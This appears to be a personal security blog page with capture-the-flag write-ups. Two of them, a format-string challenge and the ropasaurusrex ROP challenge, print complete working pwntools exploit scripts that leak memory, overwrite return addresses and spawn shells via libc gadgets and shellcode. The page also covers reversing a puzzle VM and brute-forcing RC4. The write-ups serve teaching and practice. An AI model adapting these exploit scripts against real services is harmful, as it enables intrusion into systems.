Friday, September 1, 2017

Pwnie CTF fmtstr challenge

Introduction

The danish CTF team Pwnies has held its first CTF during the Bornhack maker camp. I wasn't there but I did manage to solve a few puzzles and one of them was quite interesting. It contained four different challenges each worth a flag using the same bug in different ways.

The binary can be found at https://ctf.pwnies.dk/. In the end I had a shell and lifted the original binay and libc from which I built a docker image so that I could redo the exercise locally which is why you will see "localhost" in my exploit code below.

We were not given a binary, only source, so we would have to make some guesses and solve by trial and error which I'm not that used to. The code is below in its entirety:

// gcc -O3 -pie -fPIC fmtstr.c -o fmtstr
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

char flag3[100];

int main(int argc, char **argv){
    char *flag2_ptr;
    char *flag3_ptr;
    char flag1[100];
    char buffer[100];

    alarm(60); // One minute to get all the flags

    // Put the first flag on the stack
    if(getenv("FLAG1")){
        strncpy(flag1, getenv("FLAG1"), sizeof(flag1));
    }

    // So where is this flag?
    flag2_ptr = getenv("FLAG2");

    // OMG! Have you seen my .bss section?
    flag3_ptr = getenv("FLAG3");
    if(flag3_ptr){
        strncpy(flag3, flag3_ptr, sizeof(flag3));
        memset(flag3_ptr, 0, strlen(flag3_ptr));
    }

    // flag4 is in /home/fmtstr, you need to pop a shell...

    // happy %%%dc%%%d$hhn'ing
    while(memcmp(buffer, "exit", 4)){
        memset(buffer, 0, sizeof(buffer));
        read(0, buffer, sizeof(buffer));
        buffer[sizeof(buffer)-1] = 0;
        dprintf(1, buffer);
    }

    return 0;
}

Of course the bug is in while loop near the bottom. The program reads up to 100 bytes from us and prints them back as a format string.

FLAG1

The first flag is read from the environment and copied onto the stack so this should be pretty trivial to leak. I will start by making a map of the first 100 or so elements on the stack. Later I can probably identify where each local variable and the return address is located. I will probably also need to leak a stack address so that I can calculate where the return address is located.

#!/usr/bin/env python2
# -*- coding: utf-8 -*-

from pwn import *

context(log_level = 'error')

r = remote('localhost', 31337)
for i in range(1, 100, 1):
    r.sendline('%' + str(i) + '$016lx')
    print '%03d - %s' % (i, r.recvline().strip())

The above code will leak the first 99*8 bytes of the stack in eight byte chunks and also number them so that I can see how to easily leak specific parts.

From this I can see two parts that stick out:

....
004 - 0000000000000000
005 - 616b4f7b47414c46
006 - 6f79206f53202179
007 - 656c206e61632075
008 - 206d6f7266206b61
009 - 6361747320656874
010 - 0000000000007d6b
....
019 - 6c36313024393125
020 - 0000000000000a78
....

The bytes from 005 to 010 are the first flag and from 019 the format string buffer begins. These will come in handy.

I lift the first flag by reading items 5-10 and remembering that this is little endian so we need some byte-reversing-fu:

#!/usr/bin/env python2
# -*- coding: utf-8 -*-

from pwn import *

context(log_level = 'error')

def flag1():
    r.sendline('%5$016lx%6$016lx%7$016lx%8$016lx%9$016lx%10$016lx')
    flag = unhex(r.recvline().strip())
    return ''.join(flag[i:i+8][::-1] for i in range(0, len(flag), 8)).strip('\0')

r = remote('localhost', 31337)
print flag1()

Executing this gets us:

$ ./exploit.py
FLAG{Okay! So you can leak from the stack}

FLAG2

The next flag is referenced by a pointer on the stack. I could take a look at the map I generated earlier and make a couple of educated guesses but I'm lazy so I brute force this:


#!/usr/bin/env python2
# -*- coding: utf-8 -*-

from pwn import *
import sys

context(log_level = 'error')

r = remote('localhost', 31337)
for i in range(1, 100, 1):
    try:
        r.sendline('%' + str(i) + '$s')
        d = r.recv(1024)
        if 'FLAG' in d:
            print '%03d - %s' % (i, d.strip())
    except:
        r = remote('localhost', 31337)

We will dereference some bad pointers so I wrap the code in an exception handler. Running this gets us:

$ ./exploit.py 
071 - FLAG1=FLAG{Okay! So you can leak from the stack}
073 - FLAG2=FLAG{GOOD! You can even follow pointers}
075 - FLAG3=

Not quite what I expected, but looking into the C source we can see that flag2_ptr is never used so the compiler probably optimized it away. Luckily we can still read the environment which are also on the stack. I fix up my exploit with this new information:

def flag2():
    r.sendline('%73$s')
    return r.recvline()[6:].strip()

FLAG3

The third flag is copied to a global buffer and then reset at its original location in the environment. The buffer will be in the bss section and because this is a position independent executable we won't know where that is but probably one of the elements on the stack is a return address that points inside the main executable. From that we can likely calculate a load address and then make a guess as to where the bss is located.

I compile the program, executes it and sees that data sections are located 0x200000 bytes above the load address:

$ cat /proc/$(pidof fmtstr)/maps
55c548b4c000-55c548b4d000 r-xp 00000000 08:11 1355808     fmtstr
55c548d4c000-55c548d4d000 r--p 00000000 08:11 1355808     fmtstr
55c548d4d000-55c548d4e000 rw-p 00001000 08:11 1355808     fmtstr
...

I will brute force the elements again looking for the ELF header hoping that some return address points inside the first page of the binary.

First I will read the value at the current index, then shave off the 12 least significant bits leaving me with a page boundary (or something that will make the program crash). I will then read that address by placing it on the stack and reading it. Remember the buffer begins at the 19th element, so I pad it and puts the address at element 22:


r = remote('localhost', 31337)
for i in range(1, 100, 1):
    try:
        #Get current element
        r.sendline('%' + str(i) + '$016lx')
        #Make it a page boundary
        addr = int(r.recvline(), 16) & ~0xfff
        #Read it
        r.sendline('%22$sABABABABABABABABAB\0' + p64(addr))
        if '\x7fELF' in r.recv(1024):
            print i
    except:
        r = remote('localhost', 31337)

Running this gets us this list:

$ ./exploit.py 
32
40
43
57
60
87
95

I'll use the 32nd element and add 0x200000 to maybe find the data sections. Then I will simply dump the data and search for something resembling a flag:

def pointer():
    r.sendline('%32$016lx')
    return int(r.recvline(), 16)

def load_addr():
    return pointer() & ~0xfff

def bss():
    return load_addr() + 0x200000

def peek(addr):
    end = 'BABABABABABABABABAB'
    r.send('%22$s' + end + p64(addr))
    d = r.recv(1024).split(end)[0] + '\x00'
    return d

r = remote('localhost', 31337)
a = bss()
with open('bss', 'w') as f:
    try:
        while True:
            d = peek(a)
            a += len(d)
            f.write(d)
            f.flush()
            if 'FLAG{' in d:
                break
    except:
        pass

This gets me some of the bss and near the end should be a flag:

$ tail -n 3 bss
000010a0: 464c 4147 7b57 4155 5721 2059 6f75 2065  FLAG{WAUW! You e
000010b0: 7665 6e20 6465 6665 6174 6564 206d 7920  ven defeated my 
000010c0: 4153 4c52 7d00                           ASLR}.

Nice. I'll add another flag function:

def flag3():
    return peek(bss() + 0x10a0).rstrip('\0')

FLAG4

The last flag requires a shell or shellcode. This is amd64 and in that architecture there exists a gadget in libc that gives us instantanious shell if certain requirements are met. To find it I will need to read the code for system which is a short function. To resolve it I use DynELF and simply dump a couple hundred bytes from the resolved address:

def getDynELF():
    return DynELF(peek, pointer = pointer())

r = remote('localhost', 31337)
addr = getDynELF().lookup('system', 'libc')
count = 0
with open('system', 'w') as f:
    while count < 500:
        d = peek(addr + count)
        count += len(d)
        f.write(d)
        f.flush()

I load up the resulting file in BinaryNinja and create a amd64-linux function at address 0. It looks like this:

The call -1248 initially used hexadecimal representation so I changed that. The magic gadget is somewhere inside the function called to by system, so lets dump that:

r = remote('localhost', 31337)
addr = getDynELF().lookup('system', 'libc') - 1248
count = 0
with open('magic', 'w') as f:
    while count < 1248:
        d = peek(addr + count)
        count += len(d)
        f.write(d)
        f.flush()

In BinaryNinja it looks like this:

If you zoom into the marked block you'll see where the magic happens:

The instruction to the left of the arrow is where we want to land, at address 0x3c4 relative to this function. The only caveat is that we need a null pointer on the stack and the third instruction shows where (the 'lea rsi, [rsp+0x30]' one). At 0x30 higher than the stack pointer, but that shouldn't be hard.

So, we know where to land, but now we need to know the stack layout so that we can find the return address. That would be easier if we dumped the main function code, so lets do that:

r = remote('localhost', 31337)
addr = load_addr()
with open('main', 'w') as f:
    try:
        while True:
            d = peek(addr)
            addr += len(d)
            f.write(d)
            f.flush()
    except:
        pass

A BinaryNinja disassembly looks like this:

When entering this function the return address is at the top of the stack, but then first rbp and then rbx are pushed onto the stack. Then the stack is decremented by 0xe8 or 232. We see in the second block that the first flag is placed at the current top of stack.

Just above the loop we see that the format string buffer is at rsp+0x70 so the stack layout is like this:

+---------------+ <-- rsp
|               |
|     FLAG1     |
|               |
+---------------+ <-- rsp+0x70
|               |
|    Buffer     |
|  120 bytes    |
|               |
+---------------+ <-- rsp+0xe8, buffer+120
|   Saved RBX   |
+---------------+ <-- buffer+128
|   Saved RBP   |
+---------------+ <-- buffer+136
|    Return     |
+---------------+

Looking back into our stack map we see that the buffer starts at the 19th element. Add to that 136/8=17 elements and we find that the return address should be the 36th element.

Next I'll try to find a pointer to the stack. I will do that by writing to each element and then dump the stack looking for the pattern that I supposedly wrote:

r = remote('localhost', 31337)
for i in range(1, 100, 1):
    try:
        #First write the pattern 0xabba to where the i'th element points
        r.sendline('%0' + str(0xabba) + 'x%' + str(i) + '$n')
        r.recvline()
        #Then dump stack looking for 0xabba
        for j in range(i, 100, 1):
            r.sendline('%' + str(j) + '$016lx')
            if 'abba' in r.recvline():
                print 'Element %d points to element %d' % (i, j)
                sys.exit(0)
    except SystemExit:
        sys.exit(0)
    except:
        r = remote('localhost', 31337)

And running it gets us this:

$ ./exploit.py
Element 33 points to element 63

So, if we read the 33rd element we can subtract ((63-36) * 8) from it to get the location of the return address.

We now know all that we need. We can learn the location of the return address and we can learn where we want to land and also where to patch a null pointer. Let's do this!

def magic():
    return getDynELF().lookup('system', 'libc') - 1248 + 0x3c4

def ret_addr():
    r.sendline('%33$016lx')
    return int(r.recvline(), 16) - ((63 - 36) * 8)

def poke(addr, data):
    for i in range(len(data)):
        n = ord(data[i])
        if n < 16: packet = 'A' * n
        else: packet = '%0' + str(n) + 'x'
        packet += '%22$hhn'
        packet += 'A' * (24 - len(packet))
        packet += p64(addr + i)
        r.send(packet)
        r.recv(512)

def shell():
    #Overwrite return address with magic location
    poke(ret_addr(), p64(magic()))
    #0x30 bytes past the return address should be a null pointer
    poke(ret_addr() + 8 + 0x30, p64(0))
    #Now exit
    r.sendline('exit')
    r.recvline()
    return r

def flag4():
    shell().sendline('cat flag4 && exit')
    return r.recvall().strip()

r = remote('localhost', 31337)
print flag4()

Let's try it out:

$ ./exploit.py 
FLAG{LEET HACKER!!! YOU CAN EVEN POP SHELLS WITH FORMAT STRINGS}

And that was the end. Here is the exploit in its entirety:

#!/usr/bin/env python2
# -*- coding: utf-8 -*-

from pwn import *
import sys

context(log_level = 'error')

def flag1():
    r.sendline('%5$016lx%6$016lx%7$016lx%8$016lx%9$016lx%10$016lx')
    flag = unhex(r.recvline().strip())
    return ''.join(flag[i:i+8][::-1] for i in range(0, len(flag), 8)).strip('\0')

def flag2():
    r.sendline('%73$s')
    return r.recvline()[6:].strip()

def pointer():
    r.sendline('%32$016lx')
    return int(r.recvline(), 16)

def load_addr():
    return pointer() & ~0xfff

def bss():
    return load_addr() + 0x200000

def peek(addr):
    end = 'BABABABABABABABABAB'
    r.send('%22$s' + end + p64(addr))
    d = r.recv(1024).split(end)[0] + '\x00'
    return d

def flag3():
    return peek(bss() + 0x10a0).rstrip('\0')

def getDynELF():
    return DynELF(peek, pointer = pointer())

def magic():
    return getDynELF().lookup('system', 'libc') - 1248 + 0x3c4

def ret_addr():
    r.sendline('%33$016lx')
    return int(r.recvline(), 16) - ((63 - 36) * 8)

def poke(addr, data):
    for i in range(len(data)):
        n = ord(data[i])
        if n < 16: packet = 'A' * n
        else: packet = '%0' + str(n) + 'x'
        packet += '%22$hhn'
        packet += 'A' * (24 - len(packet))
        packet += p64(addr + i)
        r.send(packet)
        r.recv(512)

def shell():
    #Overwrite return address with magic location
    poke(ret_addr(), p64(magic()))
    #0x30 bytes past the return address should be a null pointer
    poke(ret_addr() + 8 + 0x30, p64(0))
    #Now exit
    r.sendline('exit')
    r.recvline()
    return r

def flag4():
    shell().sendline('cat flag4 && exit')
    return r.recvall().strip()

r = remote('localhost', 31337)
print flag1()
print flag2()
print flag3()
print flag4()

Thursday, July 27, 2017

ropasaurusrex

Introduction

A 2013 PlaidCTF challenge was called ropasaurusrex and it was a babys first challenge on Return Oriented Programming. It has been exhaustively documented how to solve this but all solutions I have seen assume that we know the libc that the binary runs under. In the original challenge we were actually given a copy of libc but I don't like that and it is not necessary so my solution works without having a libc copy.

Also other solutions return to system("/bin/sh") or system("cat flag") or whatever which is both boring and limiting. I want shellcode execution!

The binary

The code for the binary is very short:

read_func:
        push   ebp
        mov    ebp,esp
        sub    esp,0x98
        mov    DWORD PTR [esp+0x8],0x100
        lea    eax,[ebp-0x88]
        mov    DWORD PTR [esp+0x4],eax
        mov    DWORD PTR [esp],0x0
        call   read
        leave  
        ret    

main:
        push   ebp
        mov    ebp,esp
        and    esp,0xfffffff0
        sub    esp,0x10
        call   read_func
        mov    DWORD PTR [esp+0x8],0x4
        mov    DWORD PTR [esp+0x4],0x8048510  ; "WIN\n"
        mov    DWORD PTR [esp],0x1
        call   write
        leave  
        ret    

A C version of the above might look like this:

#include <stdio.h>
void read_func(void) {
    char buffer[136];
    read(0, buffer, 256);
}

void main(void) {
    read_func();
    write(1, "WIN\n", 4);
}

The vulnerability should be obvious...write 136 bytes to fill the buffer, the next four bytes will overwrite the saved ebp register and the next four will overwrite the return address.

So we own the return address and since raw bytes are read with read directly there are no bad bytes. We can write anything!

Strategy

So where should we return to?

A technique I use all the time is resolving symbols dynamically which pwntools helps us do using the DynELF class.

DynELF needs an arbitrary read primitive for resolving symbols and we can easily build one using the buffer overflow.

The read primitive takes an address as a parameter and should return at least one byte of data from that address but DynELF for 32 bit binaries usually reads four bytes at a time so if we can return four bytes in one go we should.

Our read primitive will overflow the buffer, overwrite the return address with the address of write@plt (which by the way is at a static address and works the same as returning to write in libc) with the given address as its read address, four as its length and stdout as its file descriptor.

Now to the really clever part...the return address from this call will be read_func itself so we get another go at overflowing the buffer and another read.

We will use this read primitive to resolve the mprotect function in libc and do a last read which will mprotect a section of mapped memory to have readable+writable+executable, read a shellcode into this memory and then return to it. Simple, right?

If you run ropasaurusrex and read its /proc/<pid>/maps file you will see that 0x08049000 is mapped and is writable so we choose this as our destination for shellcode and the address to mprotect.

The exploit

The exploit is quite simple:

#!/usr/bin/env python2

from pwn import *
from time import sleep

context(arch = 'i386', os = 'linux')

r = process('./ropasaurusrex')

SHELLCODE = asm(shellcraft.sh())
RET_OFFSET = 140
READ_FUNC = 0x80483f4
MAIN_ELF = ELF('./ropasaurusrex')
MAPPED_ADDR = 0x08049000

#Read primitive for DynELF
def l(addr):
    AMOUNT_TO_READ = 4
    r.send(flat('A' * RET_OFFSET,          #Offset to return address
                MAIN_ELF.plt['write'],     #Return to write@plt
                READ_FUNC,                 #..back to read_func after write
                1, addr, AMOUNT_TO_READ    #Args to write
                ))
    return r.recv(AMOUNT_TO_READ) #Return the received data

#Resolve mprotect from libc
dynelf = DynELF(l, elf=MAIN_ELF)
mprotect = dynelf.lookup('mprotect', 'libc')

#Build ROP chain for mprotect, read shellcode and jumping to shellcode
rop = ROP(MAIN_ELF)
rop.call(mprotect, (MAPPED_ADDR, len(SHELLCODE), 7))
rop.read(0, MAPPED_ADDR, len(SHELLCODE))
rop.call(MAPPED_ADDR)

#Send ROP chain
r.send(flat('A' * RET_OFFSET, rop.chain()))
#...shellcode must be sent separately
sleep(0.1)
#Send shellcode
r.send(SHELLCODE)
#aaand have a shell
r.interactive()

And it works:

$ ./exploit.py 
[+] Starting local process './ropasaurusrex': Done
[*] '/home/robert/code/ROP/ropasaurusrex'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE
[+] Loading from '/home/robert/code/ROP/ropasaurusrex': 0xf7784918
[+] Resolving 'mprotect' in 'libc.so': 0xf7784918
[!] No ELF provided.  Leaking is much faster if you have a copy of the ELF being leaked.
[*] Trying lookup based on Build ID: 94ab3e046784e5da65532a9aded8555c3bdc3778
[*] .gnu.hash/.hash, .strtab and .symtab offsets
[*] Found DT_GNU_HASH at 0xf7731de0
[*] Found DT_STRTAB at 0xf7731de8
[*] Found DT_SYMTAB at 0xf7731df0
[*] .gnu.hash parms
[*] hash chain index
[*] hash chain
[*] Loaded cached gadgets for './ropasaurusrex'
[*] Switching to interactive mode
$ cat flag
Yes, you've got a shell! 

I chose a simple shellcode that only gave me a shell but I could have used a stager and run an advanced multi megabyte payload. Simply returning to system("/bin/sh") would not let us do that.

Monday, June 26, 2017

DynELF illustrated

Introduction

I recently read this blog post about how the DynELF class from pwntools does what it does (which is resolving functions using info leaks).

The blog post does a very nice job describing this complex process but I think a drawing would help in understanding...a picture says more than a thousand words, right?

So I decided to hack up a program that uses the ptrace system call to attach to a process and dump the relevant data structures in dot notation. See it below.

I only dumped details about one loaded library, namely the one called libsmall.so because these structures are quite large so to keep the illustration small this was the compromise.

The code for libsmall.so can be seen here:

#include <stdio.h>

void function_nr_1() {
    printf("function_nr_1\n");
}

void function_nr_2() {
    printf("function_nr_2\n");
}

Since the original post did so well explaining I will not repeat it.

The first linkmap structure points to the main program, the next points to the vDSO. Then comes the libsmall.so followed by libc.so and the linker.

I hope this helps in understanding this exciting topic.

Monday, March 27, 2017

Danish Defence Intelligence Service Hacker academy challenge 2017

Introduction

The DDIS (danish version of NSA) recruits hackers and has an academy for teaching both offensive and defensive techniques. For their 2017 recruiting campaign they posted a puzzle for us to solve and I must say it is one of the best puzzles I have solved.

Here it is:

On the left, x86 machine code, on the right, base64 encoded something.

The text is not OCR friendly. I tried but there were too many errors that I would have to sort out manually, so I wrote a tool to cut out each character and match them up against a table I built up little by little. If no close match was found the tool would show me the character and I would provide the answer which would go into the table. Little by little the tool should get smarter, but it still took forever.

That was when someone told me to focus on the highlighted characters on the right. Put them together you get MzJoYWNrZXI1NTd6amt6aS5vbmlvbgo and base64 decode them you get 32hacker557zjkzi.onion, a dark web address. If you go there (and if it's still up) you find two images linking to two text files:


The emu pointed to a transcript of the assembly code on the left and the disk to a transcript of the base64 encoded stuff on the right.

The assembly code

The assembly shows an incomplete implementation of a virtual machine for executing a 32 bit instruction set. It uses three memory regions named DISK, MEM and REGS.

What IS implemented is a BIOS that reads one 512 byte sector from DISK into MEM:

U5_LE:
;Copy 0x200 (512) bytes from DISK to MEM
mov ecx, 0x200       ; Copy 512 bytes
mov edi, MEM         ; ...to MEM
mov esi, DISK        ; ...from DISK
rep movsb            ; Do it!

...and a fetch/decode/execute cycle that reads one 32 bit instruction, increments the program counter, zeroes a register (MIPS zero register style), decodes and executes the instruction:

SPIN:
mov edx, REG(63)     ; Read 64th entry of REGS table into edx
mov edx, PTR(edx)    ; Read MEM+edx into edx
add WORD REG(63), 4  ; Make 64th entry of REGS table point one entry higher
mov WORD REG(0), 0   ; Zero out first entry of REGS table

; The dword retrieved from MEM into edx works like a small language.
; It consists of an opcode and up to three operands like this:
; [AAAA|ABBB|BBBC|CCCC|CDDD|DDD_|____|____]
; 
; In the following code this happens:
; * The A's are moved into eax
; * The B's are moved into ebp
; * The C's are moved into esi
; * The D's are moved into edi
;
; The A's are then used to look up an instruction in the OP_TABLE, so those five bits are the opcode
; ebp, edi and esi are operands.
;
; REGS is an array of 64 dwords functioning as registers.
; REGS[63] is the program counter
; REGS[0] is initialized to zero before every execute cycle, works kind of like the MIPS zero register

; Move six bits into ebp (the B's)
mov ebp, edx
shr ebp, 21
and ebp, 77o

; Move six bits into esi (the C's)
mov esi, edx
shr esi, 15
and esi, 77o

; Move six bits into edi (the D's)
mov edi, edx
shr edi, 9
and edi, 77o

; Move top five bits into eax (the A's) and use it to look up an opcode in the OP_TABLE
; Jump to that opcode
mov eax, edx
shr eax, 27
mov eax, [OP_TABLE + eax * 4]
jmp eax

The last two instructions above isolates the top five bits and use them to look up the instruction in the OP_TABLE and then jumps to the implemenetation. However, only some of the instructions have been implemented, but it turns out they are enough to let us take an educated guess to how the rest should be implemented. A commented version of the implemented instructions folow:

; OP_LOAD_B = Load Byte (one byte)
; OP_LOAD_H = Load Half Word (two bytes)
; OP_LOAD_W = Load Word (four bytes)

; Load Word
; REGS[B] = MEM[REGS[C] + REGS[D]]
OP_LOAD_W:
mov eax, REG(esi)
add eax, REG(edi)
mov eax, PTR(eax)
mov REG(ebp), eax
jmp SPIN

; REGS[B] = REGS[C] * REGS[D]
OP_MUL:
mov eax, REG(esi)
mul DWORD REG(edi)
mov REG(ebp), eax
jmp SPIN

; REGS[B] = I << S
; [AAAA|ABBB|BBBI|IIII|IIII|IIII|IIIS|SSSS]
OP_MOVI:
mov eax, edx
mov ecx, edx
;Isolate 16 bits stating form sixth
shr eax, 5
and eax, 0xffff
;Isolate lower five bits
and ecx, 37o
shl eax, cl        ; Left shift the 'I' immediate by 'S' bits
mov REG(ebp), eax  ; ..and store them in REGS[B]
jmp SPIN

; if REGS[D] != 0:
;     REGS[B] = REGS[C]
OP_CMOV:
mov eax, REG(edi)
test eax, eax
jz .F
mov eax, REG(esi)
mov REG(ebp), eax
.F:
jmp SPIN

; Write to stdout
; putchar(REGS[B])
OP_OUT:
push DWORD REG(ebp)
call putchar
add esp, 4
jmp SPIN

; Read from DISK into MEM the 512 byte block indexed by the B register to the memory address specified by the D register
; memcpy(MEM + REGS[B], DISK + (REGS[C] * 512), 512)
OP_READ:
mov ecx, 0x200
mov esi, REG(esi)
shl esi, 9
lea esi, [DISK + esi]
mov edi, REG(ebp)
lea edi, PTR(edi)
rep movsb
jmp SPIN

Using them I implemented the rest as I think they should work into my fe_vm.c.

Running my VM implementation on the base64 decoded data shows that it is in fact bytecode for the vm:

We are asked for a password for decrypting something, but I don't know the password. I tried different words from the picture of the disk. Also tried different often used passwords without any luck. Disabling my runtrace output made me able to brute force 20-25 passwords per second so I skipped that idea. I guess I have to reverse engineer the bytecode.

Reversing the bytecode

Before getting into the bytecode (here is my commented disassembly) here are some observations about register usage:

  • r0 = zero register, always contain the value zero
  • r1 = return value from subrouting calls
  • r3 = First arg to subroutine calls
  • r4 = Second arg to subroutine calls
  • r5 = Third arg to subroutine calls
  • r59 = Link register, contains return address from subroutine calls
  • r62 = Stack register
  • r63 = Program counter, points to next instruction to execute

Calling subroutines are done either by ADD or CMOV instructions. ADD is used for unconditional calls and CMOV for conditional ones. Before calling the link register is populated with the address of the instruction following the call and argument registers are populated. For example:

; putstring("OK\n")
030c   MOVI  r3, 0xaf3        ; Address of "OK\n"
0310   MOVI  r57, 0x8         ; Set return address
0314   ADD   r59, r63, r57    ; ...more setting return address
0318   MOVI  r57, 0x870       ; Address of putstring
031c   ADD   r63, r57, r0     ; Call putstring

I did not reverse engineer the entire thing, only the routines I actually needed which are still most of them. I found a routine that simply wasted time by looping 100.000 times and another routine that called that time wasting routine three times. So, that was the reason the decryption was so slow!

I found out that RC4 was used for decrypting data. RC4 is quite easy to recognize so I stopped reversing after I discovered it. The program checked for a correct password by decrypting a 56 byte data section and matching it against the string "Another one got caught today, it's all over the papers.". If that was not the result, the "Bad key" message is printed and the program exits. So, to get to the next level we need to do a known plain text attack against RC4.

Breaking the crypto

RC4 has problems. It is a stream cipher, and the output of a good stream cipher is indistinguishable from random, but if I recall correctly the first 100 or so bytes has a bias toward one bits. This is not gonna help me thou so I go for mounting a brute force attack and crossing my fingers. I lifted both the ciphertext and plaintext from the disk image and coded a progam that searches for a usable key: pta.c

Aaaand it works.

So let's try with our newfound password.

The password is "agent", which is near the top of a dictionary, so we could have solved this by brute forcing the program after all but that would not have been nearly as fun.

The web server

So, the program rewrote itself into a web server and provided us with xinetd configuration for running it. I try that and point my browser towards it but get nothing.

Peeking inside the disk image gets us a couple of probable paths and one of them gives us this:

It says something like "Congratulations, you've solved a puzzle few people could...yada yada yada...get a free t-shirt".

However it also says "PS: Did you find everything?", so apparently there is more to the challenge. I look into the other URLs I found from peeking into the disk image. A few pictures and a couple of documents. Nothing to see thou and no apparent steganography, so what's left is looking into the machine code.

Reverse engineering the web server

I start tracing the web server code and produce a disassembly.

The code is pretty easy to read now that I have gained some experience with it and I quickly identify functions like strcpy, strchr, strcmp and others.

The web server reads a line and splits it in request method, request path and http version. Only GET requests are supported.

Then an odd sequence of checks are made (beginning from line 229 in my commented dissembly).

What happens is that a "secret" path is checked for one character at a time and in a random order making it a little harder to follow. I didn't reverse the entire path because I guessed it eventually.

Following the secret url yields this:

So, apparently I solved it. A pretty well built challenge I must say.